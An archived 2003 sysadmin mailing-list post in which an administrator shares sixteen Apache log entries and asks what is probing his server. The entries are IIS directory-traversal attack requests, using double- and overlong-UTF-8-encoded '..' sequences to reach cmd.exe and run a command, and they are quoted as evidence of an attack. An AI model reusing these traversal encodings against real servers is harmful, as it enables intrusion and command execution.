BBLISA: Strange entries in access log

Thu, 02 Jan 2003 07:02:00 -0800 

Hi, there,

For a while I am seing the following entries in my
Apache access log. It is always the same 16 lines,
coming from different IP addresses. I wonder, if
somebody can shed some light on what is it and
where do they come from. I know what these
requests will produce, if cmd.exe will ever be
found on my UNIX server.  I wonder what actually
sends these requests, is it robot, is it virus, is
it some sort of indexing software. What is it?
Should I be concerned and should I take any
precautions?

66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 
404 282
66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 
404 280
66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 290
66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 290
66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
66.189.100.35 - - [02/Jan/2003:08:08:31 -0500] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
 HTTP/1.0" 404 337 
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
66.189.100.35 - - [02/Jan/2003:08:08:32 -0500] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304


--------------

Dimitri (Dima) Shcherban

              Phone: 800-445-2588+3+36955
                 or: 508-898-6955
    Westborough ext: [823]-36955
           Cellular: 508-633-8192
              Pager: 877-563-1780
              email: [EMAIL PROTECTED]
        Pager email: [EMAIL PROTECTED]




---
Send mail for the `bblisa' mailing list to `[EMAIL PROTECTED]'.
Mail administrative requests to `[EMAIL PROTECTED]'.

Reply via email to